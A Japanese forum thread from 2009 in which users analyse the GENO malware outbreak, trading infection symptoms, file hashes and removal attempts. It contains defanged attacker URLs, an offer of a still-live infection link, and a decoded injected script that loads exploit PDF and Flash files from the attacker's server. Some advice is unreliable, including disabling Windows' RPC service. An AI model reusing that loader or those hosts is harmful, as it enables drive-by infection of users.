1 :
名無しさん@お腹いっぱい。 :
2009/04/08(水) 10:09:39 (1)感染したWebページをひらく
(2)感染したjsが、94.247.2.195の改変jquery.jsを実行
(3)IP/UAで振り分け処理(Vistaは大丈夫そう?)
(4)PDF/Flash起動。各種ウィルス本体をInternetTempに展開
(5)bufferOverrunでウィルス本体の起動を試行
以下が問題のURL、
"id=2"はpdfの脆弱性を利用し、
buffer overflowを引き起こさせ感染を試みる。(Adobe Collab overflow)
"id=3"はswf(Flash)の脆弱性を利用しoverflowを引き起こさせ、感染を試みる。
いずれも最新のFlash Playerの導入とPDF Readerを入れていれば問題なし(?)
hxxp://94.247.2.195/jquery.js
hxxp://94.247.2.195/news/?id=100
hxxp://94.247.2.195/news/?id=2
hxxp://94.247.2.195/news/?id=3
リンクは切れており現在無害(当環境では)
以下のリンクは生きており感染実験希望の方はドゾ
★危険ですので注意
hxxp://94.247.2.195/news/index.php
少しわかってること:
WINDOWSの正規ファイルを上書き(?)する可能性大
Anubisレポート
http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
4 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 10:41:58
GENOの対応酷いな まあ自力で駆除はかなり面倒だけど
5 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 10:51:40
GENOは被害者
Proxomitron用対策フィルタ。 [Patterns] Name = "GENO Virus Killer" Active = TRUE Limit = 512 Match = "<!-- (document.write\(unescape\([^\n]+)\0 -->" Replace = "<!-- !!! GENO Virus !!! -->$ALERT( !!! GENO Virus !!!\n\0 )"
セキュリティ対策【危険ポートを閉じる】
【ポート135の役割】
Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。
このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。
遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。
場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。
ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」
■ポート135を閉じる
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」
をダブルクリックし、プロパティを開く。
スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。
変更をしたらPCを再起動する。
ポート番号「445」、「ファイル共有等のサービスへのアクセス」
■ポート445を閉じる
「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから
「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。
このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。
ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。
変更をしたらPCを再起動する。
Web-based DNS Randomness Test | DNS-OARC
https://www.dns-oarc.net/oarc/services/dnsentropy を踏んでみて、もし万一「POOR」って表示されたら、
そのDNSはセキュリティ的に「もうだめぽ」ということ。
10 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 11:08:01
11 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 11:09:52
ComboFix(Geekは可)は特定のサイトからのダウソはブロックされるね DDSも起動せず。 ただComboFixで自動処理するとアカウントにログイン出来なくなる (正規ファイルを悪玉ファイルに上書き→ComboFixが処理?) 駆除失敗(・ω・`)
GENO系の最新情報集めてるスレない? ニュー速がいちばん人居るのかな
ニュー速だね。
>>8 、
>>10 の他にも感染サイトの情報がカキコされてる。
d 張り付いとくか…
>>11 hijackthis、RSITあたりでログ取っても感染ファイルが見当たらない
何でだろう
モニタリングソフト使って把握するしかないんか
めんどくせ
17 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 13:33:48
今感染してみたけど動作してんのか? ファイル生成→自身を削除 で終わりなんだけど ただIEが凄い不安定だ
どんな挙動をするか本当の所はまだ判明してないのに… これからの報告に期待する 人柱乙
仮想で踏んで分析してくれてるんじゃまいか
23 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 14:37:54
SDFixも動かない 悪玉ファイルは見つからない どうなってんの?
PDF ReaderもFlash Player最新だったんだけどなあ
adobeのPDF導入してなくても感染したって話もあったからコワイね。 未だに挙動含めてはっきりしたことわからない。
今回は既知の脆弱性を突いたウィルスだったけど、 これが未対応・未発表の脆弱性とかだったらと思うとブルブル
サイトを乗っ取られる会社がアホなんだよ。
sqlsodbc.chmファイルが上書きされて 乗っ取られた正規ファイルがsqlsodbc.chmにアクセスしまくってるんだけど もう諦める。
31 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 16:27:40
32 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 16:35:14
>9 Source Port Randomness: GREAT All
33 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 16:43:05
せめてオンラインスキャン程度薦めてくれれば擁護のしようもあるのだが
>>19 レジストリエディタの起動を阻止したり、自身を削除する前にいろいろやってる模様。
面倒くさいので、OS入れなおした。
36 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 16:54:14
行徳のSTEPの時代からひいきにしてたのに実に残念だ
ν速からきますた。。。
>>19 ,35
ν速のスレでうpされたLa.exeのバイナリをUPX圧縮を解除してバイナリエディタで中を覗いたけど、
どうもLa.exeではKドライブにある _t というフォルダを消して、_tフォルダ内のu.batを消している感じの文字列が見えた。
恐らくこの _t というフォルダの中がどうなっているのかを調べたら
具体的にどんな内容が盗み出されているかが判るんじゃないかなって思うよ。
ただ、ちょっと疑問なのはν速のスレで感染したらしき人の報告ではCドライブの直下にu.batが出来ていたらしいって事。
もしかするとこのEXEの前に予めジャンクションを張っているのか、KドライブにCドライブのどこかにある_tフォルダを
SUBSTしてるのかも知れない。
感染した状態で即効でこの _k フォルダの中身を調べてしまえばよいのかと。
× 感染した状態で即効でこの _k フォルダの中身を調べてしまえばよいのかと。 ○ 感染した状態で即効でこの _t フォルダの中身を調べてしまえばよいのかと。 訂正。
>>37 La.exeとGENOウイルスは同じものかい?
>>39 それはおいらが食らった訳じゃないから確証は持てない。
あくまで自称食らった人がうpしたものを解析しただけなんで。
MDLに94.247.*.* が沢山あるな。 登録日見ると今年に入って頑張って流行らせようとしてるみたい。
>>40 恐らく食らっててCPU負荷高い状況だと難しいと思う。
自ら言っておいてこんな事言うのはなんだけど。
>>39 まったく同じとは言い切れないがほぼ一緒か?。
GENOとcrestronjapan.com、
>>1 の生きているリンクから踏んだけど
どれも共通してu.batが生成されたから同じような動きをしてる希ガス。
このウイルスに感染すると、 ・特定のサイトに接続できなくなる ・特定の駆除ソフト、ログ取得ソフトがブロックされる(DDS、SDFix類がブロックされる) ・レジストリエディタが起動しない(リネームすることにより回避可能) ・ネットブラウジングが困難になる。(問題発生しまくり) ・sqlsodbc.chmにWindowsの正規プログラム(?)がやたらとアクセスしてる ・Windowsの正規プログラムがsqlsodbc.chmを作成したりする。 おれの環境では不正なサイトにアクセスは確認できなかった sqlsodbc.chm←これヘルプファイルだし特に危険じゃないと思うんだけど 何なんだ
>>47 あくまで推測だけど、PDFファイルやFlashファイルでバッファオーバーフローの脆弱性を突いたみたいに
HTMLヘルプのhh.exeにも同じ様な脆弱性があって、それを突いてくるファイルなのかと。
50 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 18:35:31
AMD64のCPUに替えれば無問題
- Files Created: C:\bgrn.mym C:\u.bat - Files Read: C:\WINDOWS\system32\sqlsodbc.chm - Files Modified: C:\WINDOWS\system32\sqlsodbc.chm C:\bgrn.mym C:\u.bat - Files Deleted: C:\_.t C:\u.bat
CVE-2009-0119だったりして
>>47 ウチの環境じゃ
・IEが死にまくる
・OEが死にまくる
・cmd.exeが起動しない
っていう症状が出てる。
hxxp://94.247.2.195/news/index.php
↓デコードしてみた
document.write("<div style=\"position:absolute; left:-1000px; top:-1000px;\">");
var obj=null;try{obj=new ActiveXObject("AcroPDF.PDF");}catch(e){}if(!obj){try{obj=new ActiveXObject("PDF.PdfCtrl");
}catch(e){}}if(obj)document.write('<embed src="
http://94.247.2.195/news/?id=2 " width=100 height=100 type="application/pdf"></embed>');
try{var FV=0;FV=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$"+"version").split(",");
}catch(e){}if(FV&&(FV[2]<124))document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width=100 height=100 align=middle>
<param name="movie" value="
http://94.247.2.195/news/?id=3 "/><param name="quality" value="high"/>
<param name="bgcolor" value="#ffffff"/><embed src="
http://94.247.2.195/news/?id=3 "/></embed></object>');document.write("</div>");
>>53 windows update繋がります?
56 :
54 :2009/04/08(水) 18:47:23
↑リンク外すの忘れてました;;
>>55 繋がったような希ガス
今当該機器はオフラインなので確認できない
ただシステムログにWindowsアップデート関連のエラーが一件出てた
オイオイ
59 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 18:58:44
いろいろExplorer.exe壊したw
la.exeを実行したら sqlsodbc.chm HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations を書き換えるよとcomodoさんが言った
WikiのKaspersky、Nortonで駆除で来たってネタだろw バリバリ感染した状態でANTIDOTE(カスペエンジン)最新にして スキャンかけたけど問題のjsファイルしか引っかからなかったぞw 当然症状は治らず つまりアンチウイルスは役に立たない 必死にオンラインスキャンしてるくらいだったらリカバリーするべき
カスペのオンラインスキャンをやろうと思ったのですが、 アプリケーションのデジタル証明にエラーがあります。〜 と出るのですが、気にせず実行してよいものなのでしょうか? それとも皆様はこの表示出ません?
Windows NT ( ゚Д゚)ポカーン
>>52 マイクロソフトWindows CHMファイル処理バッファオーバーフロー脆弱性
問題のため、CHMファイルを処理するとき、マイクロソフトWindowsはバッファオーバーフロー脆弱性の傾向があります。
首尾よくこの問題を利用するのに、攻撃者は、メモリを崩壊させて、これらのファイルに関連しているアプリケーションを墜落させるでしょう。
この問題の本質を考えて、また、攻撃者は勝手な規準を実行できるかもしれませんが、これは確認されていません。
Windows XP Service Pack3は被害を受け易いです。 また、他のバージョンは影響を受けるかもしれません。
68 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 19:35:55
今のところの感染確認方法は「sqlsodbc.chm」のタイムスタンプが最近だったらm9(^Д^) 古かったら⊂(^ω^)⊃セフセフ か
未だ修正が行われない crestronjapan.com だが、ヘッダにこんなんあった。 <meta name="generator" content="Movable Type Open Source 4.12" />
現状
>>47 みたいな症状が確認されてる?のかな
特定のサイトに繋がらないってのが味噌なのかもしれん
なるほど、メモリ上のexeだけ書き換えられるのね。
72 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 20:09:52
>>70 【ウイルス感染】GENOを語るスレ30【アクセス注意】
http://pc11.2ch.net/test/read.cgi/pc/1239004304/ 887 名前:名無しさん[sage] 投稿日:2009/04/08(水) 19:48:23 0
家のPCがモロ感染してたので人柱ってみた。。
結論から言うと、感染者は再インスコしかなさそう。
所要システムファイルが書き換えられてて、修復のしようがない。
で、元凶の書き換え元ファイルはまだ特定できないんだが、
とりあえずC:\WINDOWS\agh.givが作成されてて、
消しても即生成されるようなので、同名ファイルがある人は注意ね。
また追って人柱ってみます。。
889 名前:887[sage] 投稿日:2009/04/08(水) 19:52:50 0
ちなみに、カスペやトレンドマイクロのオンラインスキャンでは全く感知せず。
新種のウイルスだと思われ。
今んとこ、書き換えられてる(メモリ上書きされてる?)プロセスは以下の通り。
svchost.exe
spoolsv.exe
exproler.exe
alg.exe
winlogon.exe
おそらくファイル自体は書き換えられてない。
だからアンチウイルスでもヒットしない。
ちなみに、cmd.exeを実行したら一気に発祥したので、
疑いのある人はcmd.exeを実行しないように。
>>69 ほう。OSやhttpdはバラバラなようだから、MT(もしくはDB)の脆弱性なのか?
>>68 少なくてもCHMファイルの作成日時もしくは更新日時がウィルスを踏んで食らった時刻か、
丁度9時間ズレの時刻になってると感染確定だね。
ただ、このCHMファイルが書き換えられていなくても、
他の書き換えが行われている可能性もゼロじゃないから、
この件だけで感染の判断材料に使うのは危険だと思う。
>>69 なんかOSやHTTP鯖の種類もバラバラだけど、
CMSの種類までバラバラなのか。
Genoは確かWordPressだったでしょ。
>>74 踏んだ時刻を大体覚えてればCドライブの一週間以内に変更されたファイルを
検索して踏んだ時刻近辺に変更されたファイルを精査すれば感染/非感染が分かりそう。
自分のをざっとやってみたけど踏んだ時間近辺で変更されてるのは専ブラのdatと
avastのログファイルくらいだった。
chmはヘルプファイルだから最近インスコしたソフトがなければそう簡単に更新されたり
しないから分かり易いね。
だからメモ帳起動するとnotepad.exeが変な動きしたりしてたのか。
notepad.exe
ApntEx.exe
imapi.exe
lsass.exe
他...
結論は
>>71 か。
ウイルスの主な活動は乗っ取った正規プログラムで、
後はその家庭で作成したファイルを削除しちゃうからログ取得ツールにも表れないわけだ
>>77 もしかすると前にν速のスレでおいらが半分冗談で言ってたんだけど、
ウィルス付きメール等で事前に内部的にパスワードが盗まれて
その後堂々とFTPログインされて好き勝手に書き換えられたのかも知れないね。
あまりに杜撰すぎるけど、他で爆発的に感染していない所を見ると
この種の致命的なオペレーションレベルでのミスを見過ごしてこーいう事態を招いたのかも知れないね。
いずれにしても食らった楽天のショップが特定の1件だけって所が妙だと個人的には思ってて、
単純に外部からアタックされてやられるのならもっと楽天のショップが大量に食らっててもおかしくない話だからね。
81 :
60 :2009/04/08(水) 20:41:52
アスロンでデータ実行防止してるPCのvirtualPC上のXPsp2で実行ね HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\aux は%実行フォルダ%\..\bcrg.rhn(名前はランダムかも) HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations は \??\C:\_.t になってた sqlsodbc.chm はファイルサイズが本来50727byteから1323byteへ。 タイムスタンプは多分変わらず作成日時と更新日時が2004/08/10 そのまま再起動するも異常に時間がかかるので電源off セーフモードで再起動->システムの復元をしたがsqlsodbc.chmは改変されたまま そのままsqlsodbc.chmを踏んでみたけど mk::@MSITStore:C:\WINDOWS\system32\sqlsodbc.chm を開けません。 とダイアログが出るだけ あとはわからん
>>81 CHMファイルのタイムスタンプはオリジナルのままなのか。。。
>>81 VPC動作したのか・・・orz
感染したと思いこんでるやつように確認方法として
・ブラウジング中によく落ちる
・sqlsodbc.chmが改変されていないか確かめてみる
↓みんなこの値?
(MD5 f639afde02547603a3d3930ee4bf8c12)
>>82 そこはさっき目を通したわ。
リンクが紫だw
昨夜明け方にラトビアのIP等を元にぐぐったら
3/28頃から中国、アメリカ、フランス、イタリア等の掲示板で
感染サイトらしき所のWebマスターの相談のスレッドが立ってたりしたわ。
>>84 sqlsodbc.chmはタイムスタンプじゃなくてハッシュで確認しないと駄目だね。これ。
87 :
84 :2009/04/08(水) 20:52:01
VPC上で動作したのか・・・orz に訂正・・・
GENOウイルスが世界デビューしてる
これ拡大すんの?
件のサイト群は見てないのに、Wikiに書いてあるcmd.exeが勝手に動いてて メモリを消費してるという感染済みっぽい挙動を確認したんだけど やっぱ報告されてないだけで世界的に感染してるHPがあるんかな。 暫くはまともにネット見れなさそうね。
>>89 少しずつ改竄報告増えてるね。
もしリカバリしてもまたほかで踏みそうなきもする。
詳細が分かるまでVMで大人しくネットするしかないな
94 :
84 :2009/04/08(水) 21:06:31
だれかハッシュ値確認お願いしませう
>>94 MD5 (sqlsodbc.chm) = f639afde02547603a3d3930ee4bf8c12
XP,SP3
もとからsqlsodbc.chmなんてファイルがないんだが・・・
98 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 21:14:03
>>84 XP SP3
タイムスタンプが2004/08/05 21:00だが、ハッシュは同じ
>>84 無印XPにSP3を適用してWindowsUpdate 当てまくりで
何回かテストで踏んでるけど、全てNorton先生に撃退してもらってる環境。
一致してる。詳細は↓の通り。
ついでに全然感染サイトを踏んでいないファイルサーバーのServer2003SP2のも
タイムスタンプこそ↓とは違うけどCRC32,MD5共に一致してる。
sqlsodbc.chm
C:\WINDOWS\system32
50,727バイト
作成日時
2001年8月27日 月曜日、21:00:00
更新日時
2001年8月27日 月曜日、21:00:00
CRC32
B61C7A80
MD5
F639AFDE02547603A3D3930EE4BF8C12
踏んでウイルス食らった後に、検出できるのか? 他スレで完全スルーしたって話でてるな・・
と思ったらちゃんとあったw f639afde02547603a3d3930ee4bf8c12 c:\windows\system32\sqlsodbc.chm
adobeサイトでフラッシュとリーダーを更新しようとしたら IE7がフリーズするんだけど感染してるのかな? sqlsodbc.chmのハッシュは f639afde02547603a3d3930ee4bf8c12 なんだけど・・・
>99 特攻機で踏んだけど、作成日とか違えどサイズもハッシュもあなたのと同じです。
/) ///) /,.=゙''"/ / i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!! / / _,.-‐'~/⌒ ⌒\ / ,i ,二ニ⊃( ●). (●)\ / ノ il゙フ::::::⌒(__人__)⌒::::: \ ,イ「ト、 ,!,!| |r┬-| | / iトヾヽ_/ィ"\ `ー'´ /
VISTAは感染しないって本当なの?
>>105 だからまだウィルスの全貌が解明すらされていないのに
「○○なら大丈夫」っていう安易は発想はしないほうがいいよ。
無闇に怯えるのもアフォだけど、やたらに過信するのもヴァカだと思う。
107 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 21:57:33
GENOウイルスはなかった
>>90 Adobe ReaderやFlashが古い状態だと可能性あります
ちなみに踏んだURLを教えてくれると助かる
直接貼られると危ないんでリンク外れる程度におねがいします
もしくは他のウィルスに感染してたかです
>>105 Genoの場合はUserAgentで振り分けがあって
Vistaは対象外っぽかった
気まぐれかもしれないので確実に安全とはいえない
>>108 騒ぎが起こる前にReaderは9.1.0、Flashも10.0.22.87にしてあった。
踏んだURLは本当に気付いたらこうなってたので
どれが原因かは分からない。すまん
avast!で今チェックが終わったところだけど、感染0だったから
他のウィルスではない、と思う。あとでカスペルスキー等も試さないと…
あと、ついでだからsqlsodbc,chmのハッシュ値とかも書いておく
50,727 バイト
作成日時 2007年5月15日、16:26:18
更新日時 2006年3月2日、21:00:00
MD5 F639AFDE02547603A3D3930EE4BF8C12
113 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 22:12:00
84と同じなら99%感染してないと思う GENO含めその他のサイトで同ウイルスの感染実験したが 必ずsqlsodbcは改変された 亜種にすぐに変わるようなウイルスじゃなさそうだし、 有効な確認手段だと思う 感染してる場合は“a”から始まるハッシュ値だった(メモしわすれたorz)
今調べたんですが、ハッシュってソフト入れてそれで見るんですよね? 初心者質問本当に申し訳ない。
>>111 あー 感染してたっぽいなぁ俺w
>ちなみに感染してしまうとアドビが5分に1回ペースで更新を要求してくるという
ちなみにシステムの復元でそれはなくなった。
感染の兆候も見られない。
UACあるのにVistaが感染するわけないだろjk
119 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 22:31:15
あきらめてクリンインストします・・・
sqlsodbc.chmがないんだけど・・・
121 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 22:36:06
クリーンインスコする前にcombofix使えよ
combofix使っても無駄だろ・・・・・
>>84 うちのは
CRC32: B61C7A80
MD5: F639AFDE02547603A3D3930EE4BF8C12
SHA-1: FBDD32ED13D27E4102621E1067FDF3634F33B2C3
と出ているのですけどこれは改変されていないのでしょうか?
IEやFirefoxが不安定、regedit起動不可等 trojan.killAV に感染してた、ノートン試用版にて駆除 今のところおかしな動きなしです。
感染した人のsqlsodbc.chmはやっぱり全然違うんかな
ノートンは対応したのか、NODはまだだよな?
130 :
11 :2009/04/08(水) 23:05:27
sqlsodbc.chmの場所は c:\windows\system32\sqlsodbc.chm です。 Vistaであるかは後で確認する。 ComboFixは場合によってはログインできなくなるかも。 2回ComboFixで駆除を試みたけど、1回目は通常モードで実行して再起動後 ログインできなくなった。 2回目はセーフモードで試し、無事ログインもできたけど処理数0 (つまり何もウイルスを検出せず、ログにも怪しいものは見当たらず) ComboFixを試すのはいいけどやるんだったらセーフモードで、 ログインできなくなるリスクもあるから自己責任で。。。 (ログインできなくなると、リカバリーCDからしかリカバリできないから 注意)
ビスタも感染するんですよね?しないって言ってる人もいるけど
申し訳ありませんが sqlsodbc.chm と sqlsodbc は同一の扱いなのでしょうか?
134 :
名無しさん@お腹いっぱい。 :2009/04/08(水) 23:17:14
UACあってもVistaで感染するの?そのためのUACだと思ってたんだが ウザイからUAC切ってるとかいう元麻布みたいなのは放置するとして
>>135 vistaで踏んだあとxpで再び踏んだら多分アウト
>>1 >WINDOWSの正規ファイルを上書き(?)する可能性大
この時点でUAC発動してバレバレだしな
UACあってもUserが許可しちゃえば感染するだろ もう一回感染実験してくるノシ
CRCは家の環境でも上のやつで一致でした。
旧プログラムw
XPでもDEP有効にしてれば防げるのか?
XPsp2なんだけど、 sqlsodbc.chm C:\WINDOWS\system32 1.29 KB (1,323 バイト) MD5:BF7209B9589AD09A25740F6D47D0ADEA CRC32:7585CBB6 SHA1:D695F957AA9DEB0E4D92F4546DB3A883B1909008 ファイルサイズからして全然違う。 アウトかね
>>143 まだわかんない。
ただ、DEP以外にXPでも踏む際のアカウントにAdmin権限やSuperUser権限が無く
単なるUser権限の垢だと大丈夫とか、
そーいう感染から助かる可能性がある条件は多分あると思うよ。
それに元々HDD上のsqlsodbc.chmをリードオンリー属性にしておけば
実際に試していないから確証は無いけど
理論上は少なくてもsqlsodbc.chmに関しては書き換えられる事は防げる筈だと思うし。
>>144 おそらくそれはご愁傷様コース。
多分確実に食らってる。
>144 タ、タイムスタンプは?タイムスタンプは変わったの?
>147 2日前、 WU更新済み、norton2007入れてる状態で、adobe更新前に踏んだ。 IEとプニルがすぐ落ちる等、挙動がおかしかったんで、 avast入れてスキャンするも何も検出されず。 システムの復元は普通にブラウジング出来たんで、 クリンインスコせずに今に至る。 面倒くさがらずにクリンインスコするか
sqlsodbc.chmの 更新日時が1年前だったが、これは大丈夫かな?
>148 作成日時:2005年3月29日、17:20:39 更新日時:2007年4月17日、0:53:08
>>152 重要な情報だわ。
なんかそのハンパな日時が肝なのかもね。
基本的にこのCHMファイル自体はWindowsUpdate等でパッチが当たるファイルじゃないから、
本来は個々のWindowsの他のシステムファイルと同じ日時の筈なんだけど、
少なくてもその種の日付で保存されるとなると
まだ断定出来ないけどウィルスのプログラム等で自動生成された物ではないのかもしれないわ。
>>153 作成日時2009年4月1日、21:20:18
更新日時2008年4月14日、21:00:00
50,727 バイト
avastで踏むも更新前だったのでスルー その後a-squadで検出・削除 readerは8.14、フラッシュは最新だったと思う 不気味な事に不審な挙動全く無し・異常なし・・・ これってもうゾンビにされてる?
>>156 a-squadだと踏んだ後でも検出されるんだ、ヨカタ。
一度踏んだとなると怖いね。
今話題のsqlsodbc.chmも調べてみれば?
といっても感染したのは確定してるのか
159 :
144 :2009/04/09(木) 00:06:39
人柱となった代わりに、 踏み台にされると実際どんな被害があるのか教えてくれないか? とりあえず、すぐにでも再インスコした方がいいよね…
えと、最近使ったファイルに最近使った試しのないファイルがどんどん出ているけど まさかこれ暴れだしたってことだろうか
数回にわたる作業の末やっとましな結果が出た。 Tempにiexplore.exe→iexploreがsqlsodbc.chm、bxatg.mnn、u.batを作成 で、、感染確認後セーフモードでComboFixでbxatg.mnnを隔離 再起動後、レジストリエディタ起動、特定のサイト (bleepingcomputerからのComboFix.exeダウンロードリンク)へのアクセス成功、 ブラウザ安定でかなりいい結果じゃないかと。 bxatg.mnnの検体は可否スレに報告しておきます。 で、ComboFixで駆除を試みたのは計三回なのですが二回とも失敗 一回目は、通常モードでComboFixを実行、"bxatg.mnn"と思われるファイルを ComboFixが発見し再起動後(ComboFixによるPC再起動)ログインできなくなる。 二回目は、セーフモードでComboFixを実行するも、何も検出せず・・・ 三回目(今回)再びセーフモードで以上の結果でした。 もうちょっと検証必要っぽいので"ComboFixを過信"しないように またsqlsodbc.chmは改変されたままで、開こうとしても開けず改変されたsqlsodbc.chm は今のところ実害なし(?)この改変されたやつのハッシュは ae325e35760718d46bcebc4ad5fab953
>>158 よかった!ありがとう!
でも不思議なことにantivirが定期的にバックドアーを検出するんだよ
これとはまた別の何かかもしれないが
>>163 俺はavastだけどなんか攻撃うけてますっていうメッセージが右下から出てくる
>>159 への害はPC激重、キーロガーでこれから打つキー情報抜かれるかもetc.。
でも最インスコすれば失った時間と消すことになるデータ以外は解決
ほっといた場合
>>159 のパソコン経由で悪さされるかも
c:\windows\system32\sqlsodbc.chm のsqlsodbc.chmが見つからない! osはXP sp3 何かソフトいれないとだめなの?
>>159 リカバリは当然したほうがいいでそ。
実際何送信してるのかは未確定なのかな。
>>160 ファイル名うpればみんなの助けになるかも
>>159 このスレの最初からレスを追って貰えば判ると思うけど、
食らった際に実際にどんなデータが盗み出されたりするかとか、
その辺の詳細まではまだ残念ながらわかってないよ。
あくまで一般論でいえばWindowsのプロダクトキーだとか
Windowsインスコ時に入れた利用者名とか、
なんかのID/パスワードとか
レジストリ内に記録/保存されているデータだったりする事が往々にしてあるって感じ。
それに、クリーンインストールやリカバリをしないと
キーロガータイプのウィルスが常駐し続けて、
コピペしようとした内容とかサイト等でフォームに入力したデータ等が
逐一クラッカーの元に送り届けられてしまう事も考えられる。
とにかく、最終的にはクリーンインストールかリカバリしないと駄目です。絶対に。
>165 再インスコ前に、 専ブラのログ、各種アプリ設定ファイル、エロ画像 諸々バックアップしときたいんだけど、 それにもウィルスくっ付いてくる可能性はある?
俺のsqlsodbcは更新が2002年8月31日、21:00:00だぜ ところでTCPMonitorでdpupdchk.exeがラトビアに接続しているように見えたので終了したけど 誰か同じ人いる?
171 :
162 :2009/04/09(木) 00:19:10
sqlsodbc.chmは サイズ 1,323バイト ディスク上のサイズが 4,096バイト
>>167 今のところだいぶ前に落としたり自分で作ったファイルなどが最近アクセスされた扱いになってる
今のところ更新はされていないようだけどこの先はどうなるかわからない
>>157 作成日時 2006年3月2日、21:00:00
更新日時 2006年3月2日、21:00:00
ハッシュ:F639AFDE02547603A3D3930EE4BF8C12
>>148 イサキを思い出す。
人柱になった人、感染後に Symantec で Trojan.KillAV を検出してる人いない?
俺の会社で数台のPCが「IEが落ちまくる」「OEが落ちまくる」という症状がちょっと前から出てて
ようやく4/7付けの定義ファイルで Trojan.KillAV を検出してくれたんよ。
それまではまったく検出なし。
他の症状としてはコマンドプロンプト・レジストリエディタを起動するとExplorerが死ぬっていうのもあった。
ログオン後にExplorerが起動せずデスクトップが真っ青のまま(Explorerを起動するとアイコンとタスクバー登場)という
ものもあった。
sqlsodbc.chmはまだ調べてないけど問題の出たWindows機はまだフォーマットかけてないので
明日調べてみるよ。
有名な店だから決行感染してるんじゃないか 感染にすら気づいてない奴がほとんどだと思う
>>169 各種アプリ設定以外は気にせずバックアップしていいと思う。
各種アプリ設定は気をつけたほうがいい
このウィルスについては完全に不明だけどUSB挿すだけで
USBに感染するやつがあるからバックアップのとり方には細心の注意を
ありきたりの事しかいえなくてすまないね
179 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 00:27:27
>>175 間違いなく感染してるよそれw
数回実験したけどまったく同じ症状でた。
断言する、絶対GENOウイルスに感染してるw
ちょ、パピーヌとクレストロンジャパンはまだサイト閉じてないのかw
181 :
144 :2009/04/09(木) 00:27:54
>175 今履歴見てみたら、 BAT.trojanってのがあった。 ノートン先生が遮断してくれたみたいで、 tempフォルダから見つかってる。
>>179 デスヨネーw
sqlsodbcは時間が無くて調べてないんだ。
献体PCはもうしばらく取っておくから、「こことかこれ調べてみてくれ」ってのあったら
調べてみるお
ちなみにIE8でXPのSP3です news/?id=2に行ったけどPDFは起動しませんでした
会社の数台のPCが感染してるってのは奇妙だな まさか全てのPCがGENOやjuicyrock開いたわけでもないだろうし
http://pc11.2ch.net/test/read.cgi/pc/1239197673/39 39 :名無しさん :sage :2009/04/09(木) 00:14:21 0
前スレの958です。
combofixで検疫したファイルをVirustotalでスキャンしてみた。
ファイル名 _ycmmf_.cjq.zip 受理 2009.04.08 17:04:29 (CET)
現在の状態: 読込み中 ... 順番待ち 待機中 スキャン中 完了 発見せず 停止
結果: 7/40 (17.5%)
検知できたのは以下の7つのウィルス対策ソフトだけでした。
AntiVir TR/Agent.caaj.B
Avast Win32:Trojan-gen {Other}
eTrust-Vet Win32/SillyDl.HDU
GData Win32:Trojan-gen {Other}
McAfee-GW-Edition Trojan.Agent.caaj.B
NOD32 variant of Win32/Delf.OEX
Prevx1 High Risk Cloaked Malware
AVGもカスペルスキーもダメでした。
そうそう、それと感染中っつか発症中のコンピュータで C:\WINDOWS\ 直下や C:\Documents and Settings\username\Local Settings\ 直下に ファイルが生成され、先生はそれを Trojan.KillAV として検出してた。 で、さっさと検疫に移動させるんだけど次から次へと同じファイルが生成されて 検出リストがエラいことにwww 作成ユーザーが、ログオンユーザー以外に SYSTEM とか NETWORK SERVICE とかもいてフイタw もう俺の手には負えないって素直に負けを認めたwwwww
>>175 ちょっとまえっていつごろから?
やはり先週土曜辺り?
それより前からの情報は出てきてないよね
>>184 そうか!ありがとう!
俺は運が良かったのかな
191 :
名無しさん@お腹いっぱい。 :2009/04/09(木) 00:33:51
******まとめ*******
感染確認方法
・sqlsodbc.chmのハッシュを調べて
F639AFDE02547603A3D3930EE4BF8C12
と異なる値が出た場合感染してる可能性あり
・以下のサイト(有名な駆除ツール)にアクセスできなければ危険
(鯖落ちじゃない限り、ほぼ感染してると見て問題ないと思う)
ttp://download.bleepingcomputer.com/sUBs/ComboFix.exe ・パソコン再起動後、regedit.exeを起動しようとすると
explorerが落ちる場合、確実に感染してます。
・ブラウジングがまともにできない
駆除方法
完全な駆除方法は今のところない。(断定するのは現段階では危険)
セーフモードで、ComboFixを実行すればある程度よくなるかもしれない程度。
以上の問題が解決していればある程度よくなってるかも。
